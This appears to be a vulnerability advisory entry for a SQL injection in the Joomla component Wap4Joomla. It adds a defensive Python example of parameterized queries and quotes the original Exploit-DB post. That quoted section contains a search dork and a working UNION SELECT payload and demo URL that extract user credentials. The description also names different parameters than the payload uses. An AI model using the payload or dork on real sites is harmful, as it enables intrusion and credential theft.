Vendor: Wap4Joomla
By: Manas58
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Wap4Joomla
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component Wap4Joomla (wapmain.php) SQL Injection Vulnerability

A SQL injection vulnerability exists in Joomla Component Wap4Joomla (wapmain.php) which allows an attacker to execute arbitrary SQL commands via the 'option' and 'action' parameters. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can result in the disclosure of sensitive information from the database, such as user credentials, or even the execution of arbitrary code on the underlying operating system.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
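
The mitigation above, shown as an added example (not code from Wap4Joomla or from the original advisory): a Python/sqlite3 model of a lookup keyed on the `id` request value, first built by string concatenation and then with input validation plus a bound parameter. The `news` table, its columns, the function names and the stored values are constructed for illustration.

```python
import re
import sqlite3

# Constructed input: a UNION payload of the shape shown in the advisory,
# URL-decoded and cut down to the three columns of the sample table.
PAYLOAD = "-1 union select 1,username||':'||password,3 from jos_users limit 0,1--"


def make_db():
    """In-memory database with a constructed schema and constructed rows."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE jos_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO news VALUES (1, 'Hello', 'First item');
        INSERT INTO jos_users VALUES (1, 'admin', 'constructed-hash');
    """)
    return db


def lookup_vulnerable(db, raw_id):
    """'Before': the request value is pasted into the SQL text, so it can
    change the structure of the statement (here, append a UNION SELECT)."""
    sql = "SELECT id, title, body FROM news WHERE id = " + raw_id
    return db.execute(sql).fetchall()


def lookup_hardened(db, raw_id):
    """'After': validate first, then bind the value as a parameter."""
    # Validation: an id is a short run of ASCII digits and nothing else.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        return []
    # Parameterized query: the driver passes the value as data, never as SQL.
    sql = "SELECT id, title, body FROM news WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for value in ("1", PAYLOAD):
        print(repr(value))
        print("  vulnerable:", lookup_vulnerable(db, value))
        print("  hardened:  ", lookup_hardened(db, value))
```

Either control alone stops this payload; the bound parameter is the one that holds for every column type, while validation rejects malformed requests before they reach the database.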

Exploit-DB raw data:

Joomla Component Wap4Joomla (wapmain.php) SQL Injection Vulnerability  
      
###########################  
      
Author    : Manas58 
   
Homepage  : http://www.1923turk.com   
  
Script    : Joomla  http://www.joomlaos.de/Downloads/Joomla_und_Mambo_Komponenten/Wap4Joomla.html 
  
Download  : http://www.joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,2088.html  

Dork      : inurl:wapmain.php?option=      
###########################    
        
[ Vulnerable File ] 
 
    
wap/wapmain.php?option=onews&action=link&id= [ SQL ]  
         
    
[ XpL ]  
      
-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
  
[ Demo] 
 
http://xxxxx/wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--


  
##############################################################    
# 
# Gamoscu: http://gamoscu.wordpress.com/
#
# Baybora: http://baybora.wordpress.com/
#
# Delibey - Tiamo - Psiko - Turco - infazci - X-TRO 
#
#
#
#
#   
##############################################################